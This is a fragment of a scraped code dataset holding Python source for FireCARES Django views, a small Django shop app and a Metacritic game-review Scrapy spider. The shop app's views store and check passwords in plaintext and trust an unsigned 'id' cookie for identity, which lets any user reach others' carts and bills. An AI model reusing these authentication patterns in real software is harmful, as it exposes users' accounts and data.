"call"}, {"api_name": "sklearn.naive_bayes.BernoulliNB", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 190, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", 
"line_number": 203, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 205, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 217, "usage_type": "call"}]}
+{"seq_id": "333985639", "text": "import os\nimport requests\nfrom .forms import ForgotUsernameForm, AccountRequestForm\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom django.views.generic import View, CreateView, TemplateView\nfrom firecares.firecares_core.forms import ContactForm\nfrom firecares.tasks.email import send_mail\nfrom osgeo_importer.views import FileAddView\n\n\nclass ForgotUsername(View):\n form_class = ForgotUsernameForm\n template_name = 'registration/forgot_username.html'\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = User.objects.filter(email=form.cleaned_data['email']).first()\n if user:\n context = {'username': user.username,\n 'login': request.build_absolute_uri(reverse('login'))}\n form.send_mail('Your FireCARES Username',\n 'registration/forgot_username_email.txt',\n context,\n settings.DEFAULT_FROM_EMAIL,\n user.email)\n return HttpResponseRedirect(reverse('username_sent'))\n return render(request, self.template_name, {'form': form})\n\n\nclass ContactUs(View):\n template_name = 'contact/contact.html'\n\n def send_email(self, contact):\n body = loader.render_to_string('contact/contact_admin_email.txt', dict(contact=contact))\n\n email_message = EmailMultiAlternatives('Contact request submitted',\n body,\n settings.DEFAULT_FROM_EMAIL,\n [x[1] for x in settings.ADMINS])\n send_mail.delay(email_message)\n\n def _save_and_notify(self, form):\n m = form.save()\n self.send_email(m)\n return HttpResponseRedirect(reverse('contact_thank_you'))\n\n def get(self, request, *args, **kwargs):\n form = ContactForm()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = ContactForm(request.POST)\n\n if form.is_valid():\n if settings.RECAPTCHA_SECRET:\n data = {\n 'secret': settings.RECAPTCHA_SECRET,\n 'response': request.POST['g-recaptcha-response']\n }\n resp = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n if resp.json()['success']:\n return self._save_and_notify(form)\n else:\n form.add_error(None, 'Robot check failed. Did you check the \"I\\'m not a robot\" checkbox?')\n return render(request, self.template_name, {'form': form})\n else:\n # Captcha checking disabled\n return self._save_and_notify(form)\n return render(request, self.template_name, {'form': form})\n\n\nclass ShowMessage(TemplateView):\n \"\"\"\n Generic view for showing messages to the user.\n\n Set message with via self.request.session['message'] = 'message_string'.\n \"\"\"\n template_name = 'show_message.html'\n\n def get_context_data(self, **kwargs):\n kwargs['message'] = self.request.session.pop('message', 'Your submission has been received.')\n return super(ShowMessage, self).get_context_data(**kwargs)\n\n\nclass AccountRequestView(CreateView):\n \"\"\"\n Processes account requests.\n \"\"\"\n template_name = 'firestation/home.html'\n form_class = AccountRequestForm\n http_method_names = ['post']\n success_message = 'We will be in touch with you when FireCARES is ready. 
Please stay tuned to our partner websites'\\\n ' and major fire service conferences for updates.'\n\n def form_valid(self, form):\n \"\"\"\n If the form is valid, save the associated model.\n \"\"\"\n self.object = form.save()\n self.send_email()\n self.request.session['message'] = self.success_message\n return HttpResponseRedirect(reverse('show_message'))\n\n def form_invalid(self, form):\n \"\"\"\n If the form is invalid, re-render the context data with the\n data-filled form and errors.\n \"\"\"\n if form.errors.get('email'):\n self.request.session['message'] = form.errors['email'][0]\n else:\n self.request.session['message'] = 'Error processing request.'\n return HttpResponseRedirect(reverse('show_message'))\n\n def send_email(self):\n \"\"\"\n Email admins when new account requests are received.\n \"\"\"\n body = loader.render_to_string('contact/account_request_email.txt', dict(contact=self.object))\n email_message = EmailMultiAlternatives('New account request received.',\n body,\n settings.DEFAULT_FROM_EMAIL,\n [x[1] for x in settings.ADMINS])\n send_mail.delay(email_message)\n\n\nclass TruncatedFileAddView(FileAddView):\n def form_valid(self, form):\n fname = form.instance.file.name\n if len(fname) > 50:\n _, ext = os.path.splitext(fname)\n form.instance.file.name = fname[:46] + ext\n return super(TruncatedFileAddView, self).form_valid(form)\n", "sub_path": "firecares/firecares_core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5754, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.views.generic.View", "line_number": 17, "usage_type": "name"}, {"api_name": "forms.ForgotUsernameForm", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 45, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 45, "usage_type": "name"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "firecares.tasks.email.send_mail.delay", "line_number": 51, "usage_type": "call"}, {"api_name": "firecares.tasks.email.send_mail", 
"line_number": 51, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 56, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "firecares.firecares_core.forms.ContactForm", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "firecares.firecares_core.forms.ContactForm", "line_number": 63, "usage_type": "call"}, {"api_name": "django.conf.settings.RECAPTCHA_SECRET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.settings.RECAPTCHA_SECRET", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 83, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 96, "usage_type": "name"}, {"api_name": "forms.AccountRequestForm", "line_number": 101, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 113, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 130, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 130, "usage_type": "name"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 131, "usage_type": "call"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 133, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 133, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 134, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 134, "usage_type": "name"}, {"api_name": "firecares.tasks.email.send_mail.delay", "line_number": 135, "usage_type": "call"}, {"api_name": "firecares.tasks.email.send_mail", "line_number": 135, "usage_type": "name"}, {"api_name": "osgeo_importer.views.FileAddView", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}]}
+{"seq_id": "650546452", "text": "from django.shortcuts import render , redirect\nfrom django.urls import reverse\n# Create your views here.\nfrom django.http import HttpResponse , JsonResponse\nfrom datetime import datetime\n\nfrom . models import Members\nfrom . models import Products \nfrom . models import order_products\nfrom . models import product_cmt\nfrom . models import bill\n#from .form import Memberform\n\nfrom django.views.decorators.csrf import csrf_exempt\n#index va home lam cho vui\ndef index(request):\n return HttpResponse(\"Index\")\ndef home(request):\n\tif request.POST.get('action')=='post':\n\t\tprint('----------------Hmmmmmmmmmmmmmmm')\n\t\tmsg = request.POST.get('msg')\n\t\tjsondata={}\n\t\tjsondata['msg']=msg\n\t\treturn JsonResponse(jsondata)\n\treturn render (request, 'pools/home.html' )\n\n# tra ve toan bo object member\ndef getAll(request):\n\t\tall_members = Members.objects.all\n\t\treturn render (request , 'pools/result.html' , {'all':all_members})\n#dang ky \ndef register(request):\n\tif request.method == \"POST\":\n\t\t#form = Memberform( request.POST or None)\n\t\t#if form.is_valid() :\n\t\t#form.save()\n\t\tus = request.POST.get('userName')\n\t\tpassw = request.POST.get('password')\n\t\tem = request.POST.get('name')\n\t\tn = request.POST.get('email')\n\t\tprint( passw)\n\t\tmem = Members( userName = us , passWord = passw ,name = n , email = em)\n\t\tprint(mem.passWord)\n\t\tmem.save()\n\t\treturn render (request, 'pools/login.html')\n\telse:\t\t\n\t\treturn render( request , 'pools/register.html')\n# Them product vao cart ( chua thanh toan)\ndef add2Cart(mem_id , product_id , product_price, total ,order_date , order_status):\n\t\tproduct = Products.objects.get(product_id= product_id)\n\t\tproduct.product_quantity -= int(total) \n\t\tproduct.save()\n\t\tprint(mem_id , product_id , product_price , total , order_date , order_status) \n\t\torder = order_products( Member_id = mem_id , product_id = product_id , product_price = product_price ,total= total,\\\n\t\t\torder_date = order_date , order_status = order_status )\n\t\torder.save()\n#Tra ve trang san pham da order\ndef products(request ):\n\tall_products = Products.objects.all\n\tprint('log in call', request.method)\n\t#set cookies cho user\n\tvalue = request.COOKIES.get('id')\t\n\tuser = request.COOKIES.get('user')\n\tprint('cookie id : ' , value)\n\tprint('cookie user : ' , user)\n\tif request.method == 'POST':\n\t\tmem_id=value\n\t\tproduct_id = request.POST.get('product_id')\n\t\tproduct_price = request.POST.get('product_price')\n\t\tquantity = request.POST.get('quantity')\n\t\torder_date = datetime.today()\n\t\torder_status = 0;\n\t\tprint(' order : ', mem_id , product_id , product_price , quantity , order_date , order_status) \n\t\tadd2Cart( mem_id , product_id , product_price , quantity , order_date , order_status) \n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user ,'all_products' : all_products , 'member_id' : mem_id } )\n\telse :\n\t\tprint('GET')\n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user , 'all_products' : all_products , 'member_id' : value } )\n\n\ndef search(request ) :\n\tmem_id = request.COOKIES.get('id')\t\n\tuser = request.COOKIES.get('user')\n\tif request.method == 'POST' :\n\t\tname = request.POST.get('key_word')\n\t\tlist_product = Products.objects.filter(product_name = name)\n\t\tif list_product == None :\n\t\t\treturn redirect( 'products' )\n\t\treturn render(request, 'pools/prodcuts.html', {'user' : user ,'all_products' : list_product , 
'member_id' : mem_id } )\n\treturn redirect( 'products' )\n#login\ndef login(request):\n\tif request.method == 'POST' :\n\t\tall_members = Members.objects.all()\n\t\tfor mem in all_members :\n\t\t\tif( request.POST.get('userName') == mem.userName and request.POST.get('passWord') == mem.passWord) :\n\t\t\t\tprint(mem)\n\t\t\t\tresponse = redirect('products')\n\t\t\t\tresponse.set_cookie('id', mem.id)\n\t\t\t\tresponse.set_cookie('user', mem.name)\n\t\t\t\treturn response\n\t\t\telse :\n\t\t\t\tprint('false')\n\treturn render (request, 'pools/new_login.html')\n# tra ve tat ca comment cua member co product = product_id\ndef product_comment(request ):\n\tif request.method == 'GET' :\n\t\tall_cmt = product_cmt.objects.all()\n\t\tproduct_id = request.GET.get('product_id')\n\t\tprint('ok cmt' , product_id )\n\t\tlist_cmt = []\n\t\tprint(type(all_cmt))\n\t\tfor cmt in all_cmt :\n\t\t\tif int(product_id) == cmt.product_id : \n\t\t\t\tprint('matched ' , cmt.cmt )\n\t\t\t\tlist_cmt.append(cmt)\n\t\tprint( type(list_cmt), 'all : ', list_cmt)\n\t\treturn render(request , 'pools/product_cmt.html', {'all_cmt':list_cmt} )\n\treturn redirect( 'products' )\n\ndef add_cmt( request) :\n\tif request.method == 'POST' :\n\t\tproduct_id = request.POST.get('product_id')\n\t\tcmt = request.POST.get('cmt')\n\t\tMember_id = 1\n\t\tproduct_cmt_action = product_cmt(Member_id = Member_id , product_id = product_id , cmt = cmt)\n\t\tproduct_cmt_action.save()\n\t\treturn redirect('products')\n\treturn redirect('products')\n\ndef viewCart(request) :\n\tmember_id = request.POST.get('member_id')\n\tprint(member_id)\n\tvalue = request.COOKIES.get('id')\n\tprint('mem id ' , value)\n\tcart = order_products.objects.filter(Member_id=value,order_status=0)\n\tprint(\"cart : \", cart)\n\n\treturn render (request , 'pools/cart.html', {'cart' : cart})\n\ndef view_bills(request) :\n\tmember_id = request.POST.get('member_id')\n\tprint(member_id)\n\tvalue = request.COOKIES.get('id')\n\tprint('mem id ' , value)\n\tbills = bill.objects.filter(Member_id=value)\n\tprint(\"bills : \", bills)\n\treturn render (request , 'pools/bill.html' , {'bills' : bills})\n\n#xu ly order , tao bill\n\nfrom django.core import serializers\n\ndef create_bill(member_id):\n\t\tcurrent_date = datetime.today()\n\t\tnew_bill = bill( Member_id=member_id , total=0 , order_date=current_date)\n\t\tnew_bill.save()\n\t\treturn new_bill\n\ndef order(request) :\n\tif request.POST.get('action')=='post':\n\t\tmsg = request.POST.get('msg')\n\t\tmsg = msg.replace('[',\"\")\n\t\tmsg = msg.replace(']',\"\")\n\t\tprint(type(msg))\n\t\tprint(msg)\n\t\tres = msg.split(',')\n\t\tprint('res : ' , res )\n\t\tmember_id = request.COOKIES.get('id')\n\t\tall = order_products.objects.filter(Member_id=member_id,order_status=0)\n\t\tprint(all)\n\t\tlist_payment=[]\n\t\ttotal = 0\n\t\tnew_bill = create_bill(member_id)\n\t\tfor item in all :\n\t\t\tprint(item.id)\n\t\t\tif (str(item.id) in res ) == False:\n\t\t\t\ttotal += item.total*item.product_price\n\t\t\t\titem.order_status = new_bill.id + 1\n\t\t\t\titem.save()\n\t\t\t\tlist_payment.append(item)\n\t\t\t\tprint(item, 'saved')\n\t\tnew_bill.total = total\n\t\tnew_bill.save()\n\t\tlist = order_products.objects.filter(Member_id=member_id , order_status= 0)\n\t\t#filter by id in msg \n\t\tprint(list)\n\t\t#data = serializers.serialize('json', list_payment)\n\t\t#print(data)\n\t\t#return redirect('products')\n\treturn render (request, 'pools/home.html' )\n\n\n", "sub_path": "pools/views.py", "file_name": "views.py", "file_ext": "py", 
"file_size_in_byte": 6515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Members.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Members", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Members", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Products.objects.get", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 50, "usage_type": "name"}, {"api_name": "models.order_products", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 59, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Products.objects.filter", "line_number": 86, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Members.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Members.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Members", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 104, "usage_type": "call"}, {"api_name": "models.product_cmt.objects.all", "line_number": 108, "usage_type": "call"}, {"api_name": "models.product_cmt.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.product_cmt", "line_number": 108, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "models.product_cmt", "line_number": 126, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "models.order_products.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 136, "usage_type": "name"}, {"api_name": 
"django.shortcuts.render", "line_number": 139, "usage_type": "call"}, {"api_name": "models.bill.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.bill.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.bill", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "name"}, {"api_name": "models.bill", "line_number": 156, "usage_type": "call"}, {"api_name": "models.order_products.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 170, "usage_type": "name"}, {"api_name": "models.order_products.objects.filter", "line_number": 185, "usage_type": "call"}, {"api_name": "models.order_products.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.order_products", "line_number": 185, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "281412216", "text": "# -*- coding: utf-8 -*-\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom string import ascii_lowercase as alphabet\nimport re, calendar, datetime\nfrom bs4 import BeautifulSoup\nfrom critic.items import CriticItem\n\nclass MetacriticSpider(CrawlSpider):\n name = 'metacritic'\n allowed_domains = ['metacritic.com']\n monthAbbrs = {name: num for num, name in enumerate(calendar.month_abbr) if num}\n\n start_urls = [r'http://www.metacritic.com/browse/games/title/pc/' + i for i in alphabet] + \\\n [r'http://www.metacritic.com/browse/games/title/pc'] # a-z + '#' games\n\n rules = (\n Rule(LinkExtractor(\n # any non 0 page of # games\n allow=[r'http://www.metacritic.com/browse/games/title/pc\\?page=[1-9]{1,3}',\n # any non 0 page of a-z games\n r'http://www.metacritic.com/browse/games/title/pc/[a-z]\\?page=[1-9]{1,3}']\n )\n ),\n\n Rule(LinkExtractor(\n deny=[r'http://www.metacritic.com/game/pc/\\S+/',\n # anything deeper than /pc/gamePage\n r'http://www.metacritic.com/game/pc/[a-z0-9\\-\\!]+[\\?\\=]'],\n # '=' & '?' in /pc/gamePage appended after gamePage\n allow=[r'http://www.metacritic.com/game/pc/[^\\/]+']\n ),\n # '/' not in /pc/here ; likely a game page\n callback='parse_item',follow=True\n )\n ,)\n\n def parse_item(self,response):\n minUserReviews = 4 #no aggregate user score until this criteria met\n output = CriticItem()\n criticReviewCounts = response.css('.critic_reviews_module .count').extract()\n criticReviewCount = int(BeautifulSoup(response.css('.highlight_metascore .count a').extract_first(),'html.parser').span.contents[-1])\n output['numCriticReviews'] = criticReviewCount\n if criticReviewCount > 0:\n for span in ['.positive ','.mixed ','.negative ']: #3 possible CSS selectors containing critic metascore\n try: meanCriticReview = str(BeautifulSoup(response.css(span+'span').extract_first(), 'html.parser').span)\n except TypeError: continue\n output['meanCriticReview'] = int(re.search(r'[0-9]+',meanCriticReview).group(0))\n # get fractionCritic_\n for field, value in zip(['fractionCriticPositive','fractionCriticMixed','fractionCriticNegative'],criticReviewCounts):\n output[field] = int(re.search(r'\\d+', str(BeautifulSoup(value, 'html.parser'))).group(0))/criticReviewCount\n\n try:\n userReviewCounts = response.css('.user_reviews_module .count').extract() #negative, mixed, positive\n userReviewCount = 0\n for i in range(len(userReviewCounts)): userReviewCount += int(re.search(r'\\d+', str(BeautifulSoup(userReviewCounts[i], 'html.parser'))).group(0))\n numUserReviews = str(BeautifulSoup(response.css('.feature_userscore p').extract_first(),'html.parser').p.contents[1].contents[-1])\n if re.search('Be the first to review!',numUserReviews) or userReviewCount == 0: #no user aggregate, fractions\n output['numUserReviews'] = 0\n else: #get fractionUser_\n for field, value in zip(['fractionUserPositive', 'fractionUserMixed', 'fractionUserNegative'],userReviewCounts):\n output[field] = int(re.search(r'\\d+', str(BeautifulSoup(value, 'html.parser'))).group(0))/userReviewCount\n if re.search(r'Awaiting (\\d) more rating', numUserReviews): #no aggregate, has fractions\n output['numUserReviews'] = minUserReviews - int(re.search(r'Awaiting (\\d) more [rR]ating', numUserReviews).group(1)) #'rating' or 'Ratings'\n output['meanUserReview'] = None\n else: #has aggregate, fractions\n output['numUserReviews'] = int(re.search(r'(\\d+) [rR]ating', numUserReviews).group(1))\n meanUserReview = 
str(BeautifulSoup(response.css('.large').extract()[-2], 'html.parser'))\n output['meanUserReview'] = float(re.search(r'>(.+)<', meanUserReview).group(1))*10\n except TypeError: #game not released, not taking user reviews & no fractionUser_\n output['numUserReviews'] = 0\n try:\n output['esrb'] = BeautifulSoup(response.css('.product_rating .data').extract_first(),'html.parser').span.contents[0]\n except TypeError: pass #no rating provided so skip it\n title = BeautifulSoup(response.css('.product_title .hover_none span').extract_first(),'html.parser').span.prettify().replace('\\n','')\n output['title'] = re.search(r' ([^\\\\]+)<',title).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub = 0 #number of entries in the developer and publisher fields\n try:\n developer = BeautifulSoup(response.css('.developer .data').extract_first(), 'html.parser').prettify().replace('\\n','')\n output['developer'] = re.search(r' ([^\\\\]+)<',developer).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub += 1\n except TypeError: pass #developer not provided so skip it\n try:\n publisher = BeautifulSoup(response.css('.publisher span').extract()[-1],'html.parser').prettify().replace('\\n','')\n output['publisher'] = re.search(r' ([^\\\\]+)<', publisher).group(1).replace('&','&') # '&' gets parsed as '&'\n devAndPub += 1\n except IndexError: pass #publisher not provided so skip it\n if devAndPub == 1: # if only dev or pub is populated make them the same\n try: output['developer'] = output['publisher']\n except KeyError: output['publisher'] = output['developer']\n releaseDate = BeautifulSoup(response.css('.release_data .data').extract_first(),'html.parser').prettify().replace('\\n','')\n if re.search(r'datePublished\\\"> (\\w+)(\\s+\\d+),(\\s+\\d+)',releaseDate): #has month, day, year\n releaseDate = re.search(r'datePublished\\\"> (\\w+)(\\s+\\d+),(\\s+\\d+)', releaseDate)\n month = MetacriticSpider.monthAbbrs[releaseDate.group(1)]\n day = int(releaseDate.group(2).strip())\n year = int(releaseDate.group(3).strip())\n output['releaseDate'] = str(datetime.datetime(year, month, day))\n elif re.search(r'datePublished\\\"> TBA (\\d+)<',releaseDate): #has a TBA year release\n output['releaseDate'] = int(re.search(r'\\\"datePublished\\\"> TBA (\\d+)<',releaseDate).group(1))\n genreList = response.css('.product_genre .data').extract()\n genres = [re.search('\\\\n(.*)\\\\n',BeautifulSoup(genre, 'html.parser').prettify()).group(1).lstrip() for genre in genreList]\n if len(genres) > 0: output['genres'] = ', '.join(set(genres)) #remove duplicate genre entries\n\n output['url'] = response.url\n output['scrapyStatus'] = response.status\n yield output", "sub_path": "critic/critic/spiders/metacritic.py", "file_name": "metacritic.py", "file_ext": "py", "file_size_in_byte": 7137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 9, "usage_type": "name"}, {"api_name": "calendar.month_abbr", "line_number": 12, "usage_type": "attribute"}, {"api_name": "string.ascii_lowercase", "line_number": 14, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 26, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 26, "usage_type": "call"}, {"api_name": "critic.items.CriticItem", 
"line_number": 40, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "re.search", "line_number": 51, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 51, "usage_type": "call"}, {"api_name": "re.search", "line_number": 56, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 56, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.search", "line_number": 62, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 62, "usage_type": "call"}, {"api_name": "re.search", "line_number": 63, "usage_type": "call"}, {"api_name": "re.search", "line_number": 64, "usage_type": "call"}, {"api_name": "re.search", "line_number": 67, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 68, "usage_type": "call"}, {"api_name": "re.search", "line_number": 69, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "re.search", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 79, "usage_type": "call"}, {"api_name": "re.search", "line_number": 80, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 91, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}, {"api_name": "re.search", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 97, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "re.search", "line_number": 99, "usage_type": "call"}, {"api_name": "re.search", "line_number": 101, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 101, "usage_type": "call"}]}
